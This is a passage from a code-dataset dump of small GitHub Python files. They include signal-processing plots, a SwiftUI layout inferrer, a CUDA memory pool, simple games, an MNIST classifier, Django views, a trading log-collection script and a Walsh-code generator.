self.m_LoggerWin.ui.textEdit.appendPlainText(dataitem)\n\n","repo_name":"codekuangben/Tools","sub_path":"FileDirDiff/FileDirDiff/src/FileDirDiff/Frame/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"36770436140","text":"import numpy as np\nfrom numpy.fft import *\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\nfpwm = 10000 # pwm freq (Hz)\nf0 = 100 # fundamental freq (Hz)\nfs = 50000\nT = 3 # observation length (s)\nZ = T * 100 # zero stretch length (s)\nt = np.linspace(0, T, fs * T)\nduty = 0.5 + 0.5 * np.sin(2 * np.pi * f0 * t)\n\n# pwm wave with frequency fpwm with a duty cycle that varies according to a sine w/ frequency f0\nx = 0.5 + 0.5 * signal.square(2 * np.pi * fpwm * t, duty)\n\n# apply rc filter\nRC_filter = ([1], [0.003, 1])\ntout, y, tmp = signal.lsim(RC_filter, x, t, interp=False)\n\n# apply windowing function\nwindow = signal.windows.blackmanharris(len(x))\nx_windowed = x * window\ny_windowed = y * window\n\n# zero padding\nx_windowed = np.pad(x_windowed, (0, int(Z * fs)), mode='constant')\ny_windowed = np.pad(y_windowed, (0, int(Z * fs)), mode='constant')\n\nX = fftshift(fft(x_windowed))\nX_db = 20 * np.log10(np.abs(X) + 1)\nf_x = fftshift(fftfreq(len(x_windowed)) * fs)\n\nY = fftshift(fft(y_windowed))\nY_db = 20 * np.log10(np.abs(Y) + 1)\nf_y = fftshift(fftfreq(len(y_windowed)) * fs)\n\n# plot original and filtered pwm wave\nfig1, ax1 = plt.subplots()\nax1.set_ylim(-0.2, 1.2)\nax1.set_xlim(1 / f0, 2 / f0)\nplt.axvline(0, linewidth=1, color='black')\nplt.axhline(0, linewidth=1, color='black')\nx_minor_ticks = np.arange(1 / f0, 2 / f0, 10/fpwm)\nax1.set_xticks(x_minor_ticks, minor=True)\nax1.grid(which='minor', axis='x', alpha=0.5)\nax1.plot(t, x)\nax1.plot(t, y)\nax1.set_xlabel('Time (s)')\nax1.set_ylabel('Value')\nax1.set_title('Square Wave Filtered')\n\n# plot freq spectrum\nfig2, ax2 = plt.subplots()\nax2.plot(f_x, X_db)\nax2.plot(f_y, Y_db)\nax2.set_xlim(-25, 1025)\nx_minor_ticks = np.arange(0, 1000, 100)\nax2.set_xticks(x_minor_ticks, minor=True)\nax2.grid(which='minor', axis='x', alpha=0.5)\nax2.set_xlabel('Frequency (Hz)')\nax2.set_ylabel('Magnitude (dB)')\nax2.set_title('Frequency Spectrum')\n\n# plot RC filter freq response\nw, h = signal.freqresp(RC_filter)\nfig3, ax3 = plt.subplots()\nfreqs = w / (2*np.pi)\nh_db = 20 * np.log10(np.abs(h))\nax3.set_xscale('log')\nax3.set_title(\"RC Filter Frequency Response\")\nax3.set_xlabel('Frequency (Hz)')\nax3.set_ylabel('Magnitude (dB)')\nax3.grid()\nax3.plot(freqs, h_db)\n\nplt.show()\n","repo_name":"rchoudhary/filtering-tests","sub_path":"pwm.py","file_name":"pwm.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12415184386","text":"from view import *\nfrom constraint_solver import *\nfrom functools import reduce\nimport statistics\nfrom copy import deepcopy\n\nclass Hierarchy(View):\n
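    # Buckets views whose size along one axis stays within a tolerance of the\n    # group's running mean; enforce() later snaps every member to that mean size.\n    class size_group:\n        def 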
__init__(self, view, axis):\n self.axis = axis\n self.mean = view.size(axis)\n self.views = [view]\n\n def append(self, view):\n self.mean *= len(self.views) / (len(self.views) + 1)\n self.mean += view.size(self.axis) / (len(self.views) + 1)\n self.views.append(view)\n\n def pop(self):\n view = self.views.pop()\n self.mean -= view.size(self.axis) / (len(self.views) + 1)\n self.mean *= (len(self.views) + 1) / len(self.views)\n return view\n\n def can_append(self, view, tolerance):\n self.append(view)\n newmean = sum([view.size(self.axis) for view in self.views]) / len(self.views)\n if newmean == 0:\n return False\n valid = abs((newmean - view.size(self.axis)) / self.mean) < tolerance\n self.pop()\n return valid\n\n def enforce(self):\n # sets size of all views to group's mean\n for view in self.views:\n view.bot_right[self.axis] = view.top_left[self.axis] + self.mean\n\n def __init__(self, top_left, bot_right, view_type=ViewType.VStack, children=[]):\n super().__init__(top_left, bot_right, view_type)\n self.children = children\n\n def flatlist(self):\n l = [child.flatlist() if isinstance(child, Hierarchy) else [child] for child in self.children]\n return reduce(lambda a, b: a + b, l)\n\n def solve(self):\n ConstraintSolver([self] + self.children).solve()\n for child in self.children:\n if isinstance(child, Hierarchy):\n child.solve()\n\n def cleanse(self):\n '''Cleans the user-inputted data to match what they likely intended to\n draw. General workflow is cleanse -> solve -> to_swiftui\n '''\n # agree on size\n SIZE_TOLERANCE = .2\n for axis in [0, 1]:\n size_groups = []\n for view in self.children:\n # We don't want to include hierarchies in this calculation\n # because it is unlikely that the user wants it to be the same\n # size, and because it may mess with child views.\n if isinstance(view, Hierarchy):\n continue\n if len(size_groups) == 0:\n size_groups.append(self.size_group(view, axis))\n else:\n size_groups = sorted(size_groups, key=lambda group: abs(group.mean - view.size(axis)))\n if size_groups[0].can_append(view, SIZE_TOLERANCE):\n size_groups[0].append(view)\n else:\n size_groups.append(self.size_group(view, axis))\n for g in size_groups:\n g.enforce()\n\n # snap position\n POS_TOLERANCE = .2\n major_axis = int(self.view_type)\n gap_groups = []\n dists = [0 for i in range(len(self.children) - 1)]\n for i in range(len(self.children) - 1):\n v1, v2 = self.children[i], self.children[i + 1]\n dist = v2.top_left[major_axis] - v1.bot_right[major_axis]\n if len(gap_groups) == 0:\n gap_groups.append([(dist, i)])\n else:\n added = False\n for group in gap_groups:\n mean = sum([p[0] for p in group]) / len(group)\n if mean != 0 and abs((mean - dist)/mean) < POS_TOLERANCE:\n group.append((dist, i))\n added = True\n break\n\n if not added:\n gap_groups.append([(dist, i)])\n for group in gap_groups:\n avg = sum([p[0] for p in group]) / len(group)\n for p in group:\n dists[p[1]] = avg\n\n running_dist = self.children[0].top_left[major_axis]\n for i, dist in enumerate(dists):\n running_dist += self.children[i].size(major_axis)\n running_dist += dist\n diff = [0, 0]\n diff[major_axis] = running_dist - self.children[i + 1].top_left[major_axis]\n self.children[i + 1].move(diff)\n\n # minor\n minor_axis = (int(self.view_type) + 1) % 2\n leading = self.top_left[minor_axis]\n trailing = self.bot_right[minor_axis]\n center = (leading + trailing) / 2\n for view in self.children:\n leaddist = abs(leading - view.top_left[minor_axis])\n traildist = abs(trailing - view.bot_right[minor_axis])\n centdist = 
abs(center - view.center(minor_axis))\n diff = [0, 0]\n # if leaddist < traildist and leaddist < centdist:\n # diff[minor_axis] = leading - view.top_left[minor_axis]\n # elif traildist < centdist:\n # diff[minor_axis] = trailing - view.bot_right[minor_axis]\n if centdist / self.size(minor_axis) < .2:\n diff[minor_axis] = center - view.center(minor_axis)\n view.move(diff)\n\n for child in self.children:\n if isinstance(child, Hierarchy):\n child.cleanse()\n\n def to_swiftui(self):\n suffix = super().to_swiftui()[len(VIEW_DEFAULT):]\n stackargs = []\n if self.alignment != 1:\n if self.view_type == ViewType.VStack:\n stackargs.append(f\"alignment: {'.leading' if self.alignment == 0 else '.trailing'}\")\n if self.view_type == ViewType.HStack:\n stackargs.append(f\"alignment: {'.top' if self.alignment == 0 else '.bottom'}\")\n if self.spacing_constraint > 0:\n stackargs.append(f\"spacing: {self.spacing_constraint}\")\n stacktype = \"HStack(\" if self.view_type == ViewType.HStack else \"VStack(\"\n\n content = '\\n'.join([view.to_swiftui() for view in self.children])\n return stacktype + ', '.join(stackargs) + ') {\\n' + content + '\\n}' + suffix\n\n def deepcopy(self):\n children = [child.deepcopy() for child in self.children]\n return Hierarchy(deepcopy(self.top_left), deepcopy(self.bot_right), self.view_type, children=children)\n\n def move(self, diff):\n super().move(diff)\n for child in self.children:\n child.move(diff)\n\ndef divide_views(views, axis):\n '''Divides the given views by the axis where possible.\n axis: 0 = y, 1 = x\n returns: hiearchy, hierarchy_complexity\n '''\n views = sorted(views, key=lambda view: view.bot_right[axis])\n divided = []\n while len(views) > 0:\n cur = views.pop(0)\n section = [cur]\n while len(views) > 0 and min([view.top_left[axis] for view in views]) < cur.bot_right[axis]:\n cur = views.pop(0)\n section.append(cur)\n divided.append(section)\n\n hierarchy_complexity = 1\n children = []\n for section in divided:\n if len(section) == 1:\n children.extend(section)\n else:\n sub_root, complexity = divide_views(section, (axis + 1) % 2)\n children.append(sub_root)\n hierarchy_complexity += complexity\n top_left = [min([view.top_left[0] for view in children]), min([view.top_left[1] for view in children])]\n bot_right = [max([view.bot_right[0] for view in children]), max([view.bot_right[1] for view in children])]\n root_hierarchy = Hierarchy(top_left, bot_right, view_type=ViewType(axis), children=children)\n return root_hierarchy, hierarchy_complexity\n\ndef infer_hierarchy(views):\n '''Takes in a flat list of views and infers hierarchy'''\n root = views.pop(0)\n vert_hierarchy, vert_complexity = divide_views(views, 0)\n hori_hierarchy, hori_complexity = divide_views(views, 1)\n (_, hierarchy) = min((vert_complexity, vert_hierarchy), (hori_complexity, hori_hierarchy))\n # We do this to enforce that the root view has the same dimensions as supplied. 
Otherwise,\n    # the default behavior is that the root view will be the smallest it can be such that it can\n    # fit all of its subviews.\n    hierarchy.top_left = root.top_left\n    hierarchy.bot_right = root.bot_right\n    return hierarchy\n","repo_name":"RuohanHu/SwynthUI","sub_path":"src/hierarchy.py","file_name":"hierarchy.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25815707035","text":"import torch\n\n\nclass CudaGraphPool:\n    \"\"\"\n    Memory pool for CUDA graphs.\n    \"\"\"\n\n    def __init__(self, size, device=\"cuda\"):\n        \"\"\"\n        :param size: size of the pool in bytes.\n        \"\"\"\n        assert (size > 0) and (size % 8 == 0), f\"Size must be positive and multiple of 8, got {size}\"\n        self.pool: torch.Tensor = torch.empty(size, dtype=torch.int8, device=device)\n        self.size = len(self.pool.untyped_storage())\n        self.offset = 0\n\n    def copy_to_pool(self, t: torch.Tensor) -> torch.Tensor:\n        \"\"\"\n        Copy the tensor t into the pool and return a tensor that is a view of the pool.\n        :param t: tensor to copy into the pool\n        :return: tensor copy (that is a view of the pool)\n        \"\"\"\n\n        assert t.device == self.pool.device\n        assert self.can_store(t)\n        # 64-bit alignment\n        tensor_aligned_size = get_aligned_size(t)\n        new_offset = self.offset + tensor_aligned_size\n        # removes 0s from stride\n        stride_fixed = tuple(i if i > 0 else 1 for i in t.stride())\n        # offset is expressed in t.dtype number of elements\n        new_t = torch.as_strided(\n            self.pool.view(t.dtype), size=t.size(), stride=stride_fixed, storage_offset=self.offset // t.element_size()\n        )\n        new_t.copy_(t)\n        self.offset = new_offset\n        return new_t\n\n    def can_store(self, t: torch.Tensor) -> bool:\n        \"\"\"\n        Check if the tensor t can be stored in the pool.\n        :param t: tensor to check\n        :return: True if the tensor can be stored in the pool\n        \"\"\"\n        return (self.pool.device == t.device) and (self.size - self.offset >= get_aligned_size(t))\n\n    def reset(self):\n        \"\"\"\n        Reset the pool offset to 0.\n        \"\"\"\n        self.offset = 0\n\n\ndef get_aligned_size(t: torch.Tensor, alignment=8) -> int:\n    \"\"\"\n    Get the aligned size of the tensor t.\n    :param t: tensor to get the aligned size of\n    :param alignment: alignment size\n    :return: aligned size\n    \"\"\"\n    storage_len = len(t.untyped_storage())\n    aligned_storage_len = (storage_len + alignment - 1) // alignment * alignment\n    return aligned_storage_len\n","repo_name":"ELS-RD/kernl","sub_path":"src/kernl/optimizer/pool_cuda_graphs.py","file_name":"pool_cuda_graphs.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":1388,"dataset":"github-code","pt":"21"}
+{"seq_id":"41979026651","text":"from turtle import Screen\nfrom paddle import Paddle\nfrom ball import Ball\nfrom scorecard import Scorecard\nimport time\n\n\nscreen = Screen()\nscreen.setup(800, 600)\nscreen.title(\"PONG\")\nscreen.bgcolor(\"black\")\nscreen.tracer(0)\n\nplayer_one = Paddle((-380, 0))\nplayer_two = Paddle((370, 0))\nscorecard = Scorecard()\n\nscreen.listen()\nscreen.onkey(player_one.move_up, 'w')\nscreen.onkey(player_one.move_down, 's')\nscreen.onkey(player_two.move_up, 'Up')\nscreen.onkey(player_two.move_down, 'Down')\n\ngame_is_on = True\nball = Ball()\n\nwhile game_is_on:\n    screen.update()\n    time.sleep(0.05)\n    ball.move_forward()\n    ball_x_pos = ball.pos()[0]\n    ball_y_pos = ball.pos()[1]\n    if ball_y_pos > 270 or ball_y_pos < -270:\n        ball.change_direction()\n
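    # a paddle hit is approximated by center-to-center distance: bounce when the\n    # ball comes within 30 px of either paddle\n    if ball.distance(player_one) < 30 or 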
ball.distance(player_two) < 30:\n        ball.paddle_bounce()\n\n    if ball_x_pos > 380:\n        scorecard.player_one_score += 1\n        scorecard.update_score()\n\n    if ball_x_pos < -380:\n        scorecard.player_two_score += 1\n        scorecard.update_score()\n\nscreen.exitonclick()","repo_name":"tamilselvanyes/Python","sub_path":"100Day Challenge/Day22/pong_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"74600165811","text":"import random\n\n\nstages = ['''\n  +---+\n  |   |\n  O   |\n /|\\  |\n / \\  |\n      |\n=========\n''', '''\n  +---+\n  |   |\n  O   |\n /|\\  |\n /    |\n      |\n=========\n''', '''\n  +---+\n  |   |\n  O   |\n /|\\  |\n      |\n      |\n=========\n''', '''\n  +---+\n  |   |\n  O   |\n /|   |\n      |\n      |\n=========''', '''\n  +---+\n  |   |\n  O   |\n  |   |\n      |\n      |\n=========\n''', '''\n  +---+\n  |   |\n  O   |\n      |\n      |\n      |\n=========\n''', '''\n  +---+\n  |   |\n      |\n      |\n      |\n      |\n=========\n''']\n\n\nEnd_of_selection = False\nword_list = [\"aardvark\", \"baboon\", \"camel\"]\nchosen_word = random.choice(word_list)\nword_length = len(chosen_word)\nlives = 6\n\nprint(f\"The chosen word is \\\"{chosen_word}\\\"\")\n\ndisplay = []\n\nfor _ in range(word_length):\n    display += \"_\"\n\n# guesses must accumulate across turns, so the record of past guesses lives outside the loop\nall_guesses = \"\"\n\nwhile not End_of_selection:\n\n    guess = input(\"Guess a letter: \").lower()\n\n    if guess in all_guesses:\n        print(\"You have guessed that letter already.\\nPlease guess a different letter.\")\n        continue\n    all_guesses += guess\n\n    for position in range(word_length):\n        if chosen_word[position] == guess:\n            display[position] = guess\n\n    if guess not in chosen_word:\n        lives -= 1\n        if lives == 0:\n            End_of_selection = True\n            print(\"You lose.\")\n\n    print(f\"{' '.join(display)}\")\n\n    if \"_\" not in display:\n        End_of_selection = True\n        print(\"You win.\")\n\n    print(stages[lives])","repo_name":"lanrelawal2002/ANGELAYU-100DAYSPYTHON","sub_path":"day7/7-4-Hangman4b.py","file_name":"7-4-Hangman4b.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"13948000006","text":"#-----------------------------------------------------------------------\n# drunkenturtle.py\n#-----------------------------------------------------------------------\n\nimport sys\nimport random\nimport stddraw\nimport turtle\n\n#-----------------------------------------------------------------------\n\n# Accept as command-line arguments an integer t specifying a number of \n# iterations, and a float step specifying a step size. Create a Turtle\n# object, and have it make random steps of the given step size. 
Repeat\n# t times.\n\ndef main(args):\n    t = int(args[1])\n    step = float(args[2])\n    stddraw.createWindow()\n    myTurtle = turtle.Turtle(0.5, 0.5, 0.0)\n    for t1 in range(t):\n        myTurtle.turnLeft(360.0 * random.random())\n        myTurtle.goForward(step)\n    stddraw.show()\n    stddraw.wait()\n\nif __name__ == '__main__':\n    main(sys.argv)\n    \n#-----------------------------------------------------------------------\n\n# Example execution:\n#\n# python drunkenturtle.py 10000 .01\n","repo_name":"kuninagakura/pyStdDraw","sub_path":"drunkenturtle.py","file_name":"drunkenturtle.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"29043413828","text":"with open('primenumbers.txt', 'r') as prime_nums:\n    primes = prime_nums.read()\n\nwith open('happynumbers.txt', 'r') as happy_nums:\n    happy = happy_nums.read()\n\nprimes = list(map(int, primes.split())) # Convert to int\nhappy = list(map(int, happy.split()))\n\nsame = [a for a in primes if(a in happy)]\n\nprint(same)\n","repo_name":"Vraised3/PracticePython.org","sub_path":"23.File_Overlap.py","file_name":"23.File_Overlap.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"42188986533","text":"# USAGE : python ./monitorTorque.py LOGFILE\n\n# Author : Bruno Blais\n# Last modified : 23-01-2014\n\n#Python imports\n#----------------\nimport os\nimport sys\nimport numpy\nimport time\nimport matplotlib.pyplot as plt\nimport re # Ouhh regular expressions :)\n#----------------\n\n#********************************\n# OPTIONS AND USER PARAMETERS\n#********************************\nomega = 1.*2.*numpy.pi\nL=0.01\nR=0.0238\nk = 0.0064/0.0238\nmu=1\n#Analytical solution for the Torque in the couette geometry\n# OK, the analytical solution is correct\ntorque = -4.*numpy.pi*mu*omega*R*R*L*(k*k/(1.-k*k))\n#torque= -4*numpy.pi*mu*omega*L*(1./((k*R)**(-2.) - R**(-2.))) \n\n#======================\n# MAIN\n#======================\n\nfname=sys.argv[1]\n\n#Labeling\nax = plt.figure(\"Torque\") #Create window\nplt.ylabel('Torque [N-m]')\nplt.xlabel('Time [s]')\nplt.title('Dynamic evolution of the Torque')\n\n[t,dragX,dragY,dragZ, momentX, momentY, momentZ] = numpy.loadtxt(fname, unpack=True)\nplt.plot(t,momentZ,label='Numerical solution')\nplt.plot(t,t/t*torque,'-',label='Analytical solution')\nplt.legend()\n\nprint (\"==============================================================================\")\nprint (\"   ANALYSIS\")\nprint (\"Ratio of measured torque over analytical solution is : \", momentZ[-1]/torque)\nprint (\"Ideal solution is 1\")\nprint (\"==============================================================================\")\nplt.show()\n\n","repo_name":"blaisb/CFDEMcoupling-Mirror","sub_path":"functionalTests/cfdemSolverPisoIBm-legacy/couette/CFD/validateTorque.py","file_name":"validateTorque.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"10450728402","text":"# Editor -- Kakao had a similar problem; let's take a look.\n# the count starts at 0 by default; +1 for each character that is added\n# it looks like the characters should be handled with a stack\n'''\nSolve the problem by splitting the text into stack A and stack B.\n\nstack A: the characters in front of the cursor\nstack B: the characters behind the cursor\nThe initial cursor position equals the length of user_input.\n'''\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nstack_A,stack_B = list(input().strip()),deque()\ncommand_number = int(input())\n\nfor _ in range(command_number):\n    command = input().strip()\n\n    if \"P\" in command:\n        add_letter = command[-1]\n        stack_A.append(add_letter)\n\n    else:\n        if command == \"L\" and stack_A:\n            stack_B.appendleft(stack_A.pop())\n\n        elif command==\"D\" and stack_B:\n            stack_A.append(stack_B.popleft())\n\n        elif command ==\"B\" and stack_A:\n            stack_A.pop()\n\nprint(\"\".join(stack_A)+\"\".join(stack_B))\n\n\n\n\n\n\n\n\n","repo_name":"inkyu0103/BOJ","sub_path":"DataStructure/1406.py","file_name":"1406.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"3398105320","text":"# This file defines the object for the district level queries/stats\nimport pymongo\nimport YearStat\n\nnum_years = 5\n\nclass DistObject:\n
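    # Aggregates the last num_years seasons of draw statistics for one hunting\n    # district, holding one YearStat object per year.\n\n    def 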
[num for num in range(self.start, self.end + 1)],\n \"residency\": self.residency,\n \"year stats\": self.get_stats_dict_format(self.year_stats),\n }\n","repo_name":"philip-peiffer/hunting-stats","sub_path":"Queries/DistObject.py","file_name":"DistObject.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11524579093","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\n\n#loading data\n\ntrain_dataset = torchvision.datasets.MNIST(root = './data',download = True,train = True, transform = transforms.ToTensor())\ntest_dataset = torchvision.datasets.MNIST(root = './data',train = False, transform = transforms.ToTensor())\n\ntrainloader = torch.utils.data.DataLoader(dataset = train_dataset, shuffle = True, batch_size = 50, num_workers = 2)\ntestloader = torch.utils.data.DataLoader(dataset = test_dataset, shuffle = False, batch_size = 50, num_workers = 2)\n\nprint(\"Loading of data Completed\")\n\n# visualising data\nimport matplotlib.pyplot as plt\ndataiter = iter(trainloader)\nimage, label = dataiter.next()\nprint(label[0])\nplt.imshow(image[0].view(-1,28),cmap = 'Greys')\nplt.show()\n\n#determinig the shape of input image\nprint(image.shape)\n\n#defining our model\n\nclass Network(nn.Module):\n\t\"\"\"docstring for Network\"\"\"\n\tdef __init__(self):\n\t\tsuper(Network, self).__init__()\n\t\tself.conv1 = nn.Conv2d(1, 16, kernel_size = 3, padding = 1)\n\t\tself.conv2 = nn.Conv2d(16, 32, kernel_size = 3, padding = 1)\n\t\tself.norm1 = nn.BatchNorm2d(16)\n\t\tself.norm2 = nn.BatchNorm2d(32)\n\t\tself.relu = nn.ReLU()\n\t\tself.maxpool = nn.MaxPool2d(kernel_size = 2, stride = 2)\n\t\tself.fc1 = nn.Linear(7*7*32, 128)\n\t\tself.fc2 = nn.Linear(128, 10)\n\t\tself.dropout = nn.Dropout(p = 0.2)\n\n\tdef forward(self,x):\n\t\tx = self.maxpool(self.relu(self.norm1(self.conv1(x))))\n\t\tx = self.maxpool(self.relu(self.norm2(self.conv2(x))))\n\t\tx = x.view(-1,7*7*32)\n\t\tx = self.relu(self.fc1(x))\n\t\tx = self.dropout(x)\n\t\tx = self.fc2(x)\n\t\treturn x\n\n#initilizing our model\nnet = Network()\n\n#defining loss and optimizer\ncriterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(net.parameters(),lr = 0.001)\n\n#training the model\nnum_epochs = 5\ntotal_step = len(trainloader)\nfor epoch in range(num_epochs):\n\tfor i,(images,labels) in enumerate(trainloader):\n\t\toutput = net(images)\n\t\tloss = criterion(output,labels)\n\t\t\n\t\toptimizer.zero_grad()\n\t\tloss.backward()\n\t\toptimizer.step()\n\n\t\tif (i+1)%100 == 0:\n\t\t\tprint('Epoch[{}/{}], step[{}/{}],loss = {: .4f}'.format(epoch+1,num_epochs,i+1,total_step,loss.item()))\n\n#evaluating our model\nwith torch.no_grad():\n correct = 0\n total = 0\n for images,labels in testloader:\n \toutput = net(images)\n \t_,predicted = torch.max(output.data,dim = 1)\n \ttotal += labels.size(0)\n \tcorrect += (predicted==labels).sum().item() \n\n print('Accuracy of model on 10000 test images = {}%'.format((correct/total)*100))\t\n\n#predicting with our model\n\ndataiter = iter(testloader)\nimage, label = dataiter.next()\nwith torch.no_grad():\n\toutput = net(image)\n_,predict = torch.max(output.data,dim = 1)\nprint('predicted = {}'.format(predict[0]))\nprint('actual = 
{}'.format(label[0]))\t","repo_name":"rwalia2405/MNIST","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28320258610","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom .forms import ToDoForm\n\n# Create your views here.\ndef home(request):\n todos = ToDo.objects.order_by('post_date')[::-1]\n todoform = ToDoForm()\n ctx = {'todos' : todos, 'todoform' : todoform}\n return render(request, 'home.html', ctx)\ndef submit(request):\n action_text = request.POST.get('action_text')\n task = ToDo(action_text = action_text)\n task.save()\n return redirect('home')\ndef delete(request,id):\n task = ToDo.objects.get(pk=id)\n task.delete()\n return redirect('home')\ndef archive(request,id):\n task = ToDo.objects.get(pk=id)\n task.archive = True\n task.save()\n return redirect('home')","repo_name":"facubarafani/pruebaprogramacionb","sub_path":"pruebaprogramacionb/prueba/todolist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37405394675","text":"import contextlib\nimport re\nimport shutil\nimport tempfile\n\n\nclass HandledError(Exception):\n def __init__(self, msg, *args, **kwargs):\n super(Exception, self).__init__()\n self.message = msg.format(*args, **kwargs)\n\n\n@contextlib.contextmanager\ndef TemporaryDirectory():\n name = tempfile.mkdtemp()\n try:\n yield name\n finally:\n shutil.rmtree(name)\n\n\ndef normalize(string):\n string = string.strip()\\\n .lower()\\\n .replace(\"_\", \"-\")\n\n return re.sub(\"[^a-z0-9.-]\", \"\", string)\n","repo_name":"crepererum/eprc","sub_path":"eprc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36799897193","text":"# 插入排序\ndef insert_sort(li):\n for i in range(1, len(li)): # 要排序的区域\n j = i - 1 # 已排序的最后一位\n temp = li[i] # 要获取的元素\n while j >= 0 and li[j] > temp:\n li[j+1] = li[j]\n j = j - 1\n li[j+1] = temp # 插入元素\n\n\nlis = [3, 2, 4, 9, 1]\ninsert_sort(lis)\nprint(lis)","repo_name":"diaoyuqiang/python","sub_path":"列表的插入排序.py","file_name":"列表的插入排序.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9115111035","text":"#!/usr/bin/env python\nimport config\nimport datetime\nimport os\nimport re\nimport subprocess\nimport time\n\n# Create the report directory if its not already present\nALPHA_REPORT_DIR = os.environ['DATA_DIR'] + '/trading/' + os.environ['STRAT'] + '/exec/' + os.environ['DATE']\nif not os.path.exists(ALPHA_REPORT_DIR):\n os.makedirs(ALPHA_REPORT_DIR)\n\nos.chdir(ALPHA_REPORT_DIR)\n\n# Look at exec.conf to get list of servers\ncfg_file = os.environ['CONFIG_DIR'] + '/exec.conf'\ntrade_cfg = config.load_trade_config(cfg_file)\n\n# Create output file\noutfile = open('alpha.' 
+ os.environ['DATE'] + '.txt', 'w')\noutfile.write('ticker|kfrtAlpha (bps)|kfrtWeight|imbAlpha (bps)|imbWeight|netAlpha (bps)|timestamp\\n')\nUTC_OFFSET_TIMEDELTA = datetime.datetime.utcnow() - datetime.datetime.now()\n\ndef bps(input):\n if input.strip() == \"NA\":\n return input\n return str(10000*float(input))\n\n# Download fills file from each server\nREMOTE_LOG_DIR = '/spare/local/guillotine/log'\nalphaByTS = {}\nfor (host,port) in trade_cfg['servers']:\n server_num = re.findall('[0-9]+', host)[0]\n p = subprocess.Popen('scp ase@' + host + ':' + REMOTE_LOG_DIR + '/rts1_' + str(server_num) + '/alpha.log alpha.rts1_' + server_num + '.log',env=os.environ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n retcode = p.wait()\n if not os.path.exists('alpha.rts1_' + server_num + '.log'):\n continue\n alphaFile = open('alpha.rts1_' + server_num + '.log', 'r')\n init = False\n for line in alphaFile:\n if not init:\n init = True\n continue\n\n if len(line.strip()) == 0:\n continue\n\n fields = line.strip().split('|')\n ts = fields[0]\n temp = ts.split()\n newts = temp[0] + ' ' + temp[1].split('.')[0]\n # now convert ts to UTC\n local_datetime = datetime.datetime.strptime(newts, \"%Y/%m/%d %H:%M:%S\")\n utc_datetime = local_datetime + UTC_OFFSET_TIMEDELTA\n newts = utc_datetime.strftime(\"%Y%m%d %H:%M:%S\")\n if newts not in alphaByTS:\n alphaByTS[newts] = []\n alphaByTS[newts].append((fields[1],bps(fields[2]),fields[3],bps(fields[4]),fields[5],bps(fields[6])))\n alphaFile.close()\n p = subprocess.Popen('gzip alpha.rts1_' + server_num + '.log',env=os.environ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\n retcode = p.wait()\n\ntsList = alphaByTS.keys()\ntsList.sort()\nfor ts in tsList:\n alphaByTS[ts].sort()\n for item in alphaByTS[ts]:\n for field in item:\n outfile.write(field + '|')\n outfile.write(ts + '\\n')\n\noutfile.close()\np = subprocess.Popen('gzip alpha.' 
+ os.environ['DATE'] + '.txt',env=os.environ,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE)\nretcode = p.wait()\n\n","repo_name":"timothyyu/ml_monorepo","sub_path":"statarb/src/python/bin/alpha_report.py","file_name":"alpha_report.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"73280530931","text":"import numpy as np\n\n\ndef main():\n while True:\n s = input('Please input station number : ')\n\n if s == 'quit':\n break;\n try:\n num_of_stations = int(s)\n\n if num_of_stations <= 0:\n print(\"Please input a negative integers\")\n\n n = 1\n matrix = np.array([1])\n\n while n < num_of_stations:\n c = np.hstack((matrix, matrix))\n d = np.hstack((matrix, -matrix))\n matrix = np.vstack((c, d))\n n *= 2\n\n print(\"The sequence of stations are \")\n for x in matrix:\n print(x)\n\n if is_orthogonal(matrix):\n print(\"Matrix is orthogonal\")\n except ValueError as err:\n print(\"Please input a negative integers\")\n\n\ndef is_orthogonal(matrix):\n d = matrix.shape[0]\n\n for i in range(d):\n for j in range(i + 1, d):\n if np.dot(matrix[i], matrix[i + 1]) != 0:\n return False\n\n return True\n\n\nif __name__ 